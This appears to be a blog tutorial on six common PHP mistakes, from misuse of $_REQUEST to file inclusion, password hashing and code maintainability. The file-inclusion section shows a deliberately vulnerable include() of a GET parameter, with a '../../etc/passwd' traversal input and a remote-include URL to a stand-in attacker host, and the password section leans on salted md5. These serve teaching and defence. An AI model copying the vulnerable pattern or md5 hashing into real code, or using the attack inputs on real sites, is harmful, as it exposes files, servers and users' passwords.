Six common mistakes in PHP

Okay, so PHP is cool, PHP rocks, PHP is easy to learn… However, just because it’s cool and easy doesn’t mean that you know everything about it. There are gurus (YES!!! LOTS OF THEM!!!) and then there are newbies (WHOHOO!!! Why am I so excited?). As a guru, you know the dos and don’ts. But what if you’re new to PHP? Don’t panic. Here is a list of the top six mistakes in PHP (when I say “top” I mean the “most common” ones) that I’ve put together based on my own blood-(not-really)-and-sweat experience.

1. No or little understanding about HTTP methods

What’s the point here?

Everybody uses forms, but not everybody knows what “GET” and “POST” really do. As a result, many PHP developers tend to read user input from $_REQUEST, thinking “oh, whatever you send, I’ll catch ‘em all”. That’s not so good, really. Think of $_REQUEST as a merge of $_GET and $_POST (and, depending on your php.ini, $_COOKIE too). Now, instead of posting through your form, a user can just attach his (malicious) data to the query string, press Enter, and you’re doomed.

How to fix?

You should spend some extra time learning what GET and POST are and what they do on the web, then read from $_GET or $_POST explicitly, whichever one your form really uses. (After some careful study you may find that POST is not really secure either, since a moderately skilled user can easily fake POST data too, but that’s a different story.)

Also note that sometimes PHP’s $_GET and $_POST don’t contain any of the input data. This is likely to happen in a server-to-server data transfer (a JSON or XML body, for example), and then you must parse the raw data yourself instead of relying on PHP’s parser. Something like $data = file_get_contents('php://input'); will do, if you’re ready for that.
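
To make that last point a bit more concrete, here is a minimal sketch of parsing a raw request body by hand. The function name parseRequestBody() and the two content types it handles are my own assumptions for illustration, not something PHP provides.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: decode a raw request body according to its Content-Type.
 * Returns an empty array when the body cannot be decoded.
 */
function parseRequestBody(string $rawBody, string $contentType): array
{
    // JSON payloads never show up in $_POST, so decode them by hand.
    if (stripos($contentType, 'application/json') === 0) {
        $decoded = json_decode($rawBody, true);
        return is_array($decoded) ? $decoded : [];
    }

    // Classic form encoding: the same format PHP uses to fill $_POST.
    if (stripos($contentType, 'application/x-www-form-urlencoded') === 0) {
        $fields = [];
        parse_str($rawBody, $fields);
        return $fields;
    }

    // Unknown content type: refuse to guess.
    return [];
}

// In a real request handler (not run here):
// $data = parseRequestBody(file_get_contents('php://input'), $_SERVER['CONTENT_TYPE'] ?? '');
```

Keeping the parsing in a plain function that takes strings (rather than reading php://input inside it) makes it easy to try out from the command line.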

2. Little understanding on PHP types

Yes, what’s so bad?

As a newbie, especially if you’re coming from a strongly typed language like C#, you may find types in PHP confusing. Then you don’t know how to write a proper comparison, nor can you be sure that the 500-line function returns the data type you need. The result? Your PHP code is messy, with unnecessary lines and comments (yeah, comments are good, but only if you don’t overuse them).

How to fix?

Actually it’s not about fixing. Read more, practise more, until you (and your boss) consider yourself OK. If you want to make sure something is a string, an array etc., make use of PHP’s built-in range of “is_” functions, like is_array, is_string, is_null… If you want an exact comparison (same value AND same type), keep in mind that weird “===” operator. Remember that empty($var) returns boolean TRUE for null, 0 (the number), '0' (the string 0), '' (an empty string), an array with no elements, an unassigned variable, and FALSE itself. Play around, it’s the key.
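
Here is a small playground for the points above, just a sketch to run and tweak. The isBlank() helper is hypothetical (my own name); it shows one way to treat only null and the empty string as “nothing”, where empty() would also swallow 0 and '0'.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: true only for null or an empty string,
 * so that 0 and '0' still count as real values (unlike empty()).
 */
function isBlank($value): bool
{
    return $value === null || $value === '';
}

// Loose comparison converts types first; strict comparison does not.
$looseMatch  = ('1' == '01');   // both are numeric strings, compared as numbers
$strictMatch = ('1' === '01');  // two different strings

var_dump($looseMatch, $strictMatch);                   // bool(true), bool(false)
var_dump(empty('0'), isBlank('0'));                    // bool(true), bool(false)
var_dump(is_string('42'), is_int('42'), is_array([])); // bool(true), bool(false), bool(true)
```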

3. Misunderstanding about (external) file including

Huh?

Like, you create two common files called “header.inc.php” and “footer.inc.php”. You also put a “functions.inc.php” and a “database.class.php” into play. Now on each page, you include() the four PHP files. Isn’t it fast? Convenient? Easy to maintain?

YES!!! You rock!!! That’s the way it should be!!!

But wait. Do you know that everything has its own risks? No? Go ask here.

Just kidding. The thing is, PHP offers several ways to include another file in your current script. You should understand all of them, or you’re opening your doors and saying “Hi, Mister Exploit, my pleasure to meet you!”.

How?

Not that complex. To include a file in PHP we have at least four ways: include(), include_once(), require(), and require_once(). All of them accept a string as the path/name of the file to include and evaluate. However, they’re different. The differences are small, but they can kill.

If you try to include() a missing file, a Warning is produced and your script continues. This is sometimes what we want, sometimes not. In contrast, require() stops the whole script with a Fatal error if the to-be-included file can’t be loaded. Again, sometimes we like that, sometimes we do NOT.

An include_once is equivalent to include(), except that if the file has been included, it won’t be included (and executed) again. The same goes with require_once and require(). This is extremely important, as re-declaring a function in PHP (for now) simply generates a Fatal error. Not what you want, yes?
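
If you want to see these differences for yourself, here is a small experiment. It is only a sketch: the temporary file and the helperFromInclude() function are made up for the demo, and the @ is there purely to silence the warning.

```php
<?php
// A missing file: include only warns (silenced here with @) and returns false.
$missing = @include __DIR__ . '/this-file-does-not-exist.inc.php';

// Create a throwaway file that declares a function.
$file = tempnam(sys_get_temp_dir(), 'inc');
file_put_contents($file, "<?php\nfunction helperFromInclude() { return 'loaded'; }\n");

$first  = include_once $file; // the file is loaded and evaluated
$second = include_once $file; // already loaded: skipped, so no redeclaration error

var_dump($missing, $first, $second, helperFromInclude());
unlink($file);
```

Swap the second include_once for a plain include and PHP stops with the “Cannot redeclare” Fatal error mentioned above.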

So isn’t it safer to use include_once() or require_once() all the time? The answer is No. Everything has a price, and in PHP it’s the performance: with the _once variants PHP has to check whether the file has already been included on every call. You trade a bit of speed for this convenience, so think twice.

Also some tend to use this portion of code:

if (!isset($_GET['page']))
{
    goToIndexPage();
}
else
{
    if (file_exists($_GET['page']))
    {
        include($_GET['page']);
    }
}

What does this code do? It acts as a simple front controller, which accepts a “page” parameter via GET. So if the user goes to yoursite.com/?page=news.php, you’ll serve him your news.php file. Very handy, indeed.

But wait, what if a user by any “accident” wants to go to yoursite.com/?page=../../etc/passwd? Do you want to serve that guy your password file? I doubt that.

And if allow_url_include is turned on in your php.ini (it needs allow_url_fopen as well), he may want to pay a visit to yoursite.com/?page=http://hissite.com/devil.php… Kaboom! Think about it.
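
One common way out is to never pass user input to include() at all, and to look the page up in a fixed list instead. Below is a minimal sketch of that idea; the resolvePage() function, the $pages map and the pages/ directory are all hypothetical names of my own.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: map a user-supplied page name to a file from a fixed
 * whitelist. Anything that is not on the list falls back to the default page.
 */
function resolvePage($requested, array $pages, string $default): string
{
    // is_string() also rejects tricks like ?page[]=news (an array).
    if (is_string($requested) && isset($pages[$requested])) {
        return $pages[$requested];
    }
    return $pages[$default];
}

// Hypothetical page map: the keys are the only values ?page= may take.
$pages = [
    'index' => 'index.php',
    'news'  => 'news.php',
    'about' => 'about.php',
];

// In the front controller (not run here):
// require __DIR__ . '/pages/' . resolvePage($_GET['page'] ?? null, $pages, 'index');
```

Because the file name always comes from your own array, “../../etc/passwd” and “http://hissite.com/devil.php” simply end up on the index page.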

4. Not using any encryption

The problem

Once in a while I work as a freelancer, and my jobs are very often done on an existing site - you know, improving, enhancing, fixing bugs, whatever it’s called. And it beats me to see that in 50% of the cases, the passwords and other sensitive information are saved nakedly in the database, for any naked eye to see. Not only is it a serious security problem, it also violates privacy policies. You can be sued! Be very afraid!

The fix

Encryption (here I use the term loosely, ignoring the fact that encrypting and hashing are different things) is dead simple in PHP. What does it take to “encrypt” a string in PHP using md5? One line of code:

$my_string = 'I am a very sensitive info. Encrypt me please!';
// You can md5 the string directly. This is that one line
$encrypted = md5($my_string);
// or use a simple yet very effective technique called "salting"
define('MD5_SALT', 'A string No one can GuEss');
$encrypted = md5($my_string . MD5_SALT);

There! You now have a hashed string in the $encrypted variable. That’s called md5 hashing. How complicated is that? Now save the passwords in hashed form into the database. A word of caution, though: md5 is very fast to compute, so short or common passwords hashed this way can be guessed by brute force on today’s hardware, and a single site-wide salt only slows that down a little. For real passwords, PHP’s built-in password_hash() and password_verify() functions (PHP 5.5 and later) are the safer choice. Either way the principle is the same: later, if you want to authenticate a user, hash the typed-in password the same way and compare the result with the stored value.
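
For the record, here is what the same idea looks like with PHP’s own password functions. It is a sketch only, and the sample password is obviously made up.

```php
<?php
declare(strict_types=1);

// Registration: store only the hash. password_hash() generates a random
// salt for every password and embeds it (and the algorithm) in the result.
$hash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);

// Login: verify the typed-in password against the stored hash.
$ok  = password_verify('correct horse battery staple', $hash);
$bad = password_verify('wrong guess', $hash);

// Upgrade path: rehash at login if PHP's default algorithm has moved on.
if ($ok && password_needs_rehash($hash, PASSWORD_DEFAULT)) {
    $hash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);
}

var_dump($ok, $bad); // bool(true), bool(false)
```

Note that there is no salt constant to manage here: the salt travels inside the hash string, so one database column is all you need.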

There is however one catch with this method: the password retrieval feature. No, you simply can’t decrypt the hashed string to give the password back to that absent-minded Bob. As an alternative, you will have to create a new random password for him. This is what I’m doing now:

// generate a random string based on the microtime value
// (note: microtime is guessable; random_bytes() is a safer source in PHP 7+)
$random_string = md5(microtime());
// now as the string is 32 characters in length, chop it a bit
// let's say the first 6 characters
$new_password = substr($random_string, 0, 6);
// save the new password into database. Remember to hash it the same way as at login!!!
saveToDatabase(md5($new_password));
// mail Bob
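
If you’re on PHP 7 or later, a variant of the same idea can draw its randomness from random_int() instead of the clock. This is a sketch under my own assumptions: generateTemporaryPassword() and its alphabet are invented for the example, and saving the hash and mailing Bob are left out.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: build a temporary password from a
 * cryptographically secure random source.
 */
function generateTemporaryPassword(int $length = 12): string
{
    // Look-alike characters (0/O, 1/l/I) are left out to spare Bob some typos.
    $alphabet = 'abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789';
    $maxIndex = strlen($alphabet) - 1;

    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= $alphabet[random_int(0, $maxIndex)];
    }
    return $password;
}

$newPassword = generateTemporaryPassword();
// Store only the hash; the plain text goes to Bob and nowhere else.
$storedHash = password_hash($newPassword, PASSWORD_DEFAULT);
```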

If you prefer returning the old password to our Bob, consider a two-way encryption library such as OpenSSL or Sodium (mcrypt, once the usual choice, is deprecated and was dropped from PHP’s core in 7.2).

5. Little care about optimization

The situation

You’re developing a good site. It’s cuil - you know what I mean. People know it. Many guys start contributing by writing you good articles. You receive 372 comments on each post. You begin to place ads and earn some money. Wind blows, water flows, men go, dogs bo-wo (that’s how dogs bark in my country), till one morning you wake up and realize that it takes five minutes for your website to generate and display a news item about Steve Jobs’ heartache. What happened? You can swear that it USED to be lightning fast just ONE MONTH ago! What the hell happened?

The (possible) cause

Everybody can write code, but not everybody can (or takes the time to) optimize it. According to Wikipedia, optimization is “the process of modifying a system to make some aspect of it work more efficiently or use fewer resources”. The fewer resources your code uses, the faster your site is. Take a look at this code:

$my_string = "I will blah 100 times: ";
for ($i = 0; $i < 100; ++$i)
{
    $my_string .= "blah";
}
echo $my_string;
exit();

While it doesn’t look so bad, there are at least 3 problems within those mere 7 lines of code above:

  1. Improper use of double quotes (2 times). As PHP looks for variables to parse in a double quoted string, assigning “This string” to a variable may take slightly more time than assigning ‘This string’. The gain is tiny, but single quotes also make it obvious that nothing is being interpolated.
  2. Not making use of the built-in function str_repeat(). Built-in functions are usually faster than the equivalent loop written in PHP.
  3. The 2 final lines can be combined into one.

Now take a look at this:

$my_string = 'I will blah 100 times: ';
exit($my_string . str_repeat('blah', 100));

How does that look? Not only is it shorter, it’s also way cleaner and better optimized. The difference may not be significant on a small idle site, but in a big enterprise application, every bit is gold. So take out the unnecessary code, try to find an equivalent built-in function for those 100 lines of code, try combining your statements, and so on - here is a very good tutorial on this topic. Once you think that your code is perfect, it’s time to consider database optimization, but I’ll talk about that in another post, not here, not now.
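
Before you start rewriting things, though, it pays to measure. Here is a rough sketch of a timing helper to compare the two versions above; timeIt() is a name I made up, hrtime() needs PHP 7.3 or later, and the numbers will vary from machine to machine.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: run a callable many times and
 * return the elapsed time in milliseconds.
 */
function timeIt(callable $fn, int $iterations = 10000): float
{
    $start = hrtime(true); // nanoseconds from a monotonic clock
    for ($i = 0; $i < $iterations; $i++) {
        $fn();
    }
    return (hrtime(true) - $start) / 1e6;
}

// The original loop version.
$withLoop = function (): string {
    $s = 'I will blah 100 times: ';
    for ($i = 0; $i < 100; ++$i) {
        $s .= 'blah';
    }
    return $s;
};

// The str_repeat() version.
$withBuiltin = function (): string {
    return 'I will blah 100 times: ' . str_repeat('blah', 100);
};

printf("loop:       %.2f ms\n", timeIt($withLoop));
printf("str_repeat: %.2f ms\n", timeIt($withBuiltin));
```

If the two numbers are close, the shorter version still wins on readability; if one part of your page is much slower than the rest, that is where your optimization time should go.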

6. Little care about the successors

Successors? Who are they?

They are the next guys to work with your PHP code (maybe your son, your senior, yourself, or even me).

I’ve seen quite a few developers who write code like tomorrow’s the end of the world. To name a few of their habits:

  • No comments, or comments written in Sanskrit. No, I don’t know Sanskrit, and neither does my dad, nor my Indian buddy Yousuf. I can’t even read French. I’m dead. Help!!!
  • Using short tags (<? ?> instead of <?php ?>). What if one day your site moves to another host where short tags are disabled? What if PHP (very likely) decides to remove short tag support from the next version?
  • Not using a framework. Agreed, there are sites and pages so simple that a framework just means “bloated”. But in other cases, a good framework can only help. It standardizes the way you code, it has security measures, and it’s fast to develop with. Learning to use a framework is definitely not a pain in the ass, and there are plenty out there: Zend, Cake, CodeIgniter, Seagull etc.
  • Encrypting your code. Unless you are going to sell your code and give out a demo, you don’t need such security. It’s gonna be hell when you lose the encryption key. Worst.hell.ever.

Science has it that our beautiful earth will only vanish after at least 500 million more years. That’s not exactly the near future, so when you write your code, think about the guys who will be in charge of it tomorrow, and they will thank you.

